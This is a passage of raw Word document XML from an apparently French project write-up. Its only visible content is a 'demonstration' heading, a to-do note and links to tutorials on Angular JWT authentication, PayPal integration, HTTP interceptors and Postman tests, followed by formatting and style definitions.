      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4B0E0B9A" w14:textId="77777777" w:rsidR="0026692F" w:rsidRDefault="0026692F" w:rsidP="008E39B1"/>
    <w:p w14:paraId="74DFEECE" w14:textId="77777777" w:rsidR="00726CDC" w:rsidRDefault="00726CDC" w:rsidP="00CF6F55">
      <w:pPr>
        <w:pStyle w:val="Titre1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Place à la démonstration !</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD94933" w14:textId="77777777" w:rsidR="00BF5050" w:rsidRDefault="00BF5050" w:rsidP="00BF5050"/>
    <w:p w14:paraId="23DA06D1" w14:textId="77777777" w:rsidR="000D5378" w:rsidRDefault="000D5378" w:rsidP="00BF5050"/>
    <w:p w14:paraId="7E4438DE" w14:textId="77777777" w:rsidR="00C2214C" w:rsidRDefault="00246930" w:rsidP="00C2214C">
      <w:r>
        <w:rPr>
          <w:color w:val="A8D08D" w:themeColor="accent6" w:themeTint="99"/>
        </w:rPr>
        <w:t>//TO DO</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Subsctract</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> of (veille)</w:t>
      </w:r>
      <w:r w:rsidR="00C2214C">
        <w:t xml:space="preserve">JWT : </w:t>
      </w:r>
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidR="00C2214C">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
          </w:rPr>
          <w:t>https://blog.angular-university.io/angular-jwt-authentication/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1A469EA7" w14:textId="77777777" w:rsidR="00C2214C" w:rsidRDefault="00C2214C" w:rsidP="00C2214C">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Paypal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> : </w:t>
      </w:r>
      <w:hyperlink r:id="rId11" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
          </w:rPr>
          <w:t>https://enngage.github.io/ngx-paypal/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="224125D7" w14:textId="77777777" w:rsidR="00C2214C" w:rsidRDefault="00C2214C" w:rsidP="00BF5050"/>
    <w:p w14:paraId="38557349" w14:textId="77777777" w:rsidR="00246930" w:rsidRDefault="00246930" w:rsidP="00BF5050"/>
    <w:p w14:paraId="41348A9E" w14:textId="77777777" w:rsidR="00246930" w:rsidRDefault="00246930" w:rsidP="00BF5050"/>
    <w:p w14:paraId="17B693BC" w14:textId="77777777" w:rsidR="00246930" w:rsidRDefault="00246930" w:rsidP="00BF5050"/>
    <w:p w14:paraId="524E5FF3" w14:textId="77777777" w:rsidR="00246930" w:rsidRDefault="00246930" w:rsidP="00BF5050">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Optionnal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> : </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C3C026" w14:textId="77777777" w:rsidR="00246930" w:rsidRDefault="00246930" w:rsidP="00246930"/>
    <w:p w14:paraId="27AF4799" w14:textId="77777777" w:rsidR="00246930" w:rsidRDefault="00C41B9A" w:rsidP="00246930">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="256" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId12" w:history="1">
        <w:r w:rsidR="00246930">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
          </w:rPr>
          <w:t>https://medium.com/@ryanchenkie_40935/angular-authentication-using-the-http-client-and-http-interceptors-2f9d1540eb8</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0A5A919A" w14:textId="77777777" w:rsidR="00246930" w:rsidRDefault="00C41B9A" w:rsidP="00246930">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="256" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId13" w:history="1">
        <w:r w:rsidR="00246930">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
          </w:rPr>
          <w:t>https://angular.io/guide/http</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4F906C54" w14:textId="77777777" w:rsidR="00246930" w:rsidRDefault="00246930" w:rsidP="00246930">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="256" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7298B2DF" w14:textId="77777777" w:rsidR="00246930" w:rsidRDefault="00C41B9A" w:rsidP="00246930">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="256" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId14" w:history="1">
        <w:r w:rsidR="00246930">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
          </w:rPr>
          <w:t>https://ryanchenkie.com/angular-authentication-using-the-http-client-and-http-interceptors</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6713057A" w14:textId="77777777" w:rsidR="00246930" w:rsidRPr="00BF5050" w:rsidRDefault="00C41B9A" w:rsidP="00BF5050">
      <w:hyperlink r:id="rId15" w:history="1">
        <w:r w:rsidR="008C6A0D">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
          </w:rPr>
          <w:t>https://learning.getpostman.com/docs/postman/scripts/test_examples/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:sectPr w:rsidR="00246930" w:rsidRPr="00BF5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53889"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1D0CB4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AC9480B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1E18FBD4"/>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C8F4A5B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A44A48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16305A7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D892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F60917"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BE2C2690"/>
    <w:lvl w:ilvl="0">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1150" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="OpenSymbol" w:eastAsia="OpenSymbol" w:hAnsi="OpenSymbol" w:cs="OpenSymbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="◦"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1510" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="OpenSymbol" w:eastAsia="OpenSymbol" w:hAnsi="OpenSymbol" w:cs="OpenSymbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1870" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="OpenSymbol" w:eastAsia="OpenSymbol" w:hAnsi="OpenSymbol" w:cs="OpenSymbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2230" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="OpenSymbol" w:eastAsia="OpenSymbol" w:hAnsi="OpenSymbol" w:cs="OpenSymbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="◦"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2590" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="OpenSymbol" w:eastAsia="OpenSymbol" w:hAnsi="OpenSymbol" w:cs="OpenSymbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2950" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="OpenSymbol" w:eastAsia="OpenSymbol" w:hAnsi="OpenSymbol" w:cs="OpenSymbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3310" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="OpenSymbol" w:eastAsia="OpenSymbol" w:hAnsi="OpenSymbol" w:cs="OpenSymbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="◦"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3670" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="OpenSymbol" w:eastAsia="OpenSymbol" w:hAnsi="OpenSymbol" w:cs="OpenSymbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4030" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="OpenSymbol" w:eastAsia="OpenSymbol" w:hAnsi="OpenSymbol" w:cs="OpenSymbol"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="5" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="2E23414D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EC286F5C"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="785"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8A3674"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BD1C7FCA"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="5"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="643"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81" w:hanging="72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853" w:hanging="1440"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl/>
      <w:lvlText w:val="%1.%2.%3.%4.%5.%6.%7"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4279" w:hanging="144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491" w:hanging="1800"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="7" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="3F707C4A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="03F66E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0275FA2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1BF850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69167F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BBB8F81E"/>
    <w:lvl w:ilvl="0" w:tplc="040C0001">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1870" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"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10" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="4A5F7381"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BAC0E970"/>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CAB0C59"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C032CE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5D0E2D86"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3ABCB042"/>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3" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="5D386A19"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3F16B6FA"/>
    <w:lvl w:ilvl="0">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1068" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
        <w:sz w:val="20"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1788" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
        <w:sz w:val="20"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2508" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
        <w:sz w:val="20"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3228" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
        <w:sz w:val="20"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3948" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
        <w:sz w:val="20"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4668" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
        <w:sz w:val="20"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5388" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
        <w:sz w:val="20"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6108" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
        <w:sz w:val="20"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6828" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
        <w:sz w:val="20"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="14" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="63F90FE1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AFE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22A2D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="65B0858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DEA7F5F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="526C5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1A63BB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="75A83216"/>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16"/>
  </w:num>
  <w:num w:numId="2">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="3">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="15">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="16">
    <w:abstractNumId w:val="6"/>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EE"/>
    <w:rsid w:val="00001FCB"/>
    <w:rsid w:val="000149BD"/>
    <w:rsid w:val="00020402"/>
    <w:rsid w:val="00033E96"/>
    <w:rsid w:val="00053246"/>
    <w:rsid w:val="00056AF0"/>
    <w:rsid w:val="0008350C"/>
    <w:rsid w:val="00093BA4"/>
    <w:rsid w:val="000A3566"/>
    <w:rsid w:val="000A5B3A"/>
    <w:rsid w:val="000B4AC8"/>
    <w:rsid w:val="000C4F97"/>
    <w:rsid w:val="000C661B"/>
    <w:rsid w:val="000D5378"/>
    <w:rsid w:val="000D71A0"/>
    <w:rsid w:val="001067EE"/>
    <w:rsid w:val="00145D9E"/>
    <w:rsid w:val="00196DAE"/>
    <w:rsid w:val="001F508D"/>
    <w:rsid w:val="00204AF7"/>
    <w:rsid w:val="00206BFA"/>
    <w:rsid w:val="002179FA"/>
    <w:rsid w:val="00226D87"/>
    <w:rsid w:val="002378FA"/>
    <w:rsid w:val="00242EC2"/>
    <w:rsid w:val="00246930"/>
    <w:rsid w:val="00253F8C"/>
    <w:rsid w:val="0026692F"/>
    <w:rsid w:val="00283D2E"/>
    <w:rsid w:val="002B4593"/>
    <w:rsid w:val="002B566C"/>
    <w:rsid w:val="002C192F"/>
    <w:rsid w:val="002D0E47"/>
    <w:rsid w:val="002D2034"/>
    <w:rsid w:val="002D2F7D"/>
    <w:rsid w:val="002F5BE3"/>
    <w:rsid w:val="003041D4"/>
    <w:rsid w:val="003049F3"/>
    <w:rsid w:val="00310748"/>
    <w:rsid w:val="00314067"/>
    <w:rsid w:val="00321DA0"/>
    <w:rsid w:val="003248C6"/>
    <w:rsid w:val="00332581"/>
    <w:rsid w:val="003329F4"/>
    <w:rsid w:val="00344CA6"/>
    <w:rsid w:val="00345B39"/>
    <w:rsid w:val="00357E73"/>
    <w:rsid w:val="00372B6D"/>
    <w:rsid w:val="00397C06"/>
    <w:rsid w:val="003A3C7A"/>
    <w:rsid w:val="003D7CDE"/>
    <w:rsid w:val="003E5542"/>
    <w:rsid w:val="003F40FB"/>
    <w:rsid w:val="00411FB4"/>
    <w:rsid w:val="00421A1C"/>
    <w:rsid w:val="004725CE"/>
    <w:rsid w:val="004872A2"/>
    <w:rsid w:val="00492DB4"/>
    <w:rsid w:val="004A0FA4"/>
    <w:rsid w:val="004A29BD"/>
    <w:rsid w:val="004A322D"/>
    <w:rsid w:val="004C6830"/>
    <w:rsid w:val="004D1B67"/>
    <w:rsid w:val="004D7C75"/>
    <w:rsid w:val="004E5337"/>
    <w:rsid w:val="00505A44"/>
    <w:rsid w:val="0051668D"/>
    <w:rsid w:val="005440F6"/>
    <w:rsid w:val="005515E7"/>
    <w:rsid w:val="00574090"/>
    <w:rsid w:val="00576509"/>
    <w:rsid w:val="00614BEE"/>
    <w:rsid w:val="006248F1"/>
    <w:rsid w:val="00625919"/>
    <w:rsid w:val="00630C36"/>
    <w:rsid w:val="00694C45"/>
    <w:rsid w:val="00695370"/>
    <w:rsid w:val="006B3820"/>
    <w:rsid w:val="006B7F38"/>
    <w:rsid w:val="006C38AC"/>
    <w:rsid w:val="00714F70"/>
    <w:rsid w:val="00720231"/>
    <w:rsid w:val="00726CDC"/>
    <w:rsid w:val="00734B5E"/>
    <w:rsid w:val="007360F8"/>
    <w:rsid w:val="007362B8"/>
    <w:rsid w:val="00751955"/>
    <w:rsid w:val="00753690"/>
    <w:rsid w:val="00760302"/>
    <w:rsid w:val="007652F6"/>
    <w:rsid w:val="007736EF"/>
    <w:rsid w:val="007B574E"/>
    <w:rsid w:val="007C32BE"/>
    <w:rsid w:val="007C6D63"/>
    <w:rsid w:val="00802224"/>
    <w:rsid w:val="00804085"/>
    <w:rsid w:val="00804EF5"/>
    <w:rsid w:val="0081552F"/>
    <w:rsid w:val="008374DB"/>
    <w:rsid w:val="00847519"/>
    <w:rsid w:val="00867E1D"/>
    <w:rsid w:val="008949F4"/>
    <w:rsid w:val="008A0DC7"/>
    <w:rsid w:val="008B6978"/>
    <w:rsid w:val="008B7D4A"/>
    <w:rsid w:val="008C6A0D"/>
    <w:rsid w:val="008E39B1"/>
    <w:rsid w:val="009116EB"/>
    <w:rsid w:val="00913997"/>
    <w:rsid w:val="00935AA6"/>
    <w:rsid w:val="00950CF8"/>
    <w:rsid w:val="00954592"/>
    <w:rsid w:val="009632D1"/>
    <w:rsid w:val="00975FAC"/>
    <w:rsid w:val="00976677"/>
    <w:rsid w:val="00983505"/>
    <w:rsid w:val="009C19CA"/>
    <w:rsid w:val="00A000E5"/>
    <w:rsid w:val="00A01C86"/>
    <w:rsid w:val="00A129AA"/>
    <w:rsid w:val="00A2557A"/>
    <w:rsid w:val="00A6172B"/>
    <w:rsid w:val="00A63E54"/>
    <w:rsid w:val="00A74150"/>
    <w:rsid w:val="00A77332"/>
    <w:rsid w:val="00A96A8C"/>
    <w:rsid w:val="00AA5203"/>
    <w:rsid w:val="00AD5E95"/>
    <w:rsid w:val="00AE558E"/>
    <w:rsid w:val="00AE6042"/>
    <w:rsid w:val="00AF330F"/>
    <w:rsid w:val="00AF5AB1"/>
    <w:rsid w:val="00B02E7D"/>
    <w:rsid w:val="00B22D6F"/>
    <w:rsid w:val="00B455B6"/>
    <w:rsid w:val="00B55D74"/>
    <w:rsid w:val="00B81270"/>
    <w:rsid w:val="00B97FD3"/>
    <w:rsid w:val="00BA36CB"/>
    <w:rsid w:val="00BB5B43"/>
    <w:rsid w:val="00BD0F99"/>
    <w:rsid w:val="00BD38A2"/>
    <w:rsid w:val="00BF48D0"/>
    <w:rsid w:val="00BF5050"/>
    <w:rsid w:val="00C02199"/>
    <w:rsid w:val="00C1218C"/>
    <w:rsid w:val="00C2214C"/>
    <w:rsid w:val="00C24460"/>
    <w:rsid w:val="00C3764D"/>
    <w:rsid w:val="00C41B9A"/>
    <w:rsid w:val="00C6387E"/>
    <w:rsid w:val="00C70158"/>
    <w:rsid w:val="00C77597"/>
    <w:rsid w:val="00C80A10"/>
    <w:rsid w:val="00C93694"/>
    <w:rsid w:val="00CA3CB6"/>
    <w:rsid w:val="00CE7F7D"/>
    <w:rsid w:val="00CF4D41"/>
    <w:rsid w:val="00CF6F55"/>
    <w:rsid w:val="00D14A1E"/>
    <w:rsid w:val="00D1646E"/>
    <w:rsid w:val="00D348FE"/>
    <w:rsid w:val="00D34A9E"/>
    <w:rsid w:val="00D54400"/>
    <w:rsid w:val="00D55B0E"/>
    <w:rsid w:val="00D666D5"/>
    <w:rsid w:val="00D7613C"/>
    <w:rsid w:val="00D80F6F"/>
    <w:rsid w:val="00DA0B34"/>
    <w:rsid w:val="00DA6729"/>
    <w:rsid w:val="00DE7798"/>
    <w:rsid w:val="00E959A2"/>
    <w:rsid w:val="00E95CCC"/>
    <w:rsid w:val="00EA2E92"/>
    <w:rsid w:val="00EC067A"/>
    <w:rsid w:val="00F2520B"/>
    <w:rsid w:val="00F5620E"/>
    <w:rsid w:val="00F67528"/>
    <w:rsid w:val="00F70D70"/>
    <w:rsid w:val="00F8017C"/>
    <w:rsid w:val="00F8550C"/>
    <w:rsid w:val="00F90566"/>
    <w:rsid w:val="00FA3DA1"/>
    <w:rsid w:val="00FF07EF"/>
    <w:rsid w:val="00FF2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EAB2"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{8C6235D0-737F-48A9-B97E-4702166B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106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D1B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67E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qFormat/>
    <w:rsid w:val="001067EE"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00975FAC"/>
    <w:pPr>
      <w:suppressAutoHyphens/>
      <w:autoSpaceDN w:val="0"/>
      <w:spacing w:before="100" w:after="100" w:line="240" w:lineRule="auto"/>
      <w:textAlignment w:val="baseline"/>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4D1B67"/>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CE7F7D"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:color w:val="2E74B5" w:themeColor="accent1" w:themeShade="BF"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Standard">
    <w:name w:val="Standard"/>
    <w:rsid w:val="00411FB4"/>
    <w:pPr>
      <w:autoSpaceDN w:val="0"/>
      <w:spacing w:line="256" w:lineRule="auto"/>
      <w:textAlignment w:val="baseline"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pl-ent">
    <w:name w:val="pl-ent"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:rsid w:val="00314067"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pl-e">
    <w:name w:val="pl-e"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:rsid w:val="00314067"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pl-s">
    <w:name w:val="pl-s"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:rsid w:val="00314067"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pl-pds">
    <w:name w:val="pl-pds"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:rsid w:val="00314067"/>
  </w:style>
  <w:style w:type="character" w:styleId="Lienhypertexte">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0026692F"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Lienhypertextesuivivisit">
    <w:name w:val="FollowedHyperlink"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00246930"/>
    <w:rPr>
      <w:color w:val="954F72" w:themeColor="followedHyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="paragraph">
    <w:name w:val="paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00A741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A74150"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="eop">
    <w:name w:val="eop"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:rsid w:val="00A74150"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="spellingerror">
    <w:name w:val="spellingerror"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:rsid w:val="00A7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7513">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="794905397">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
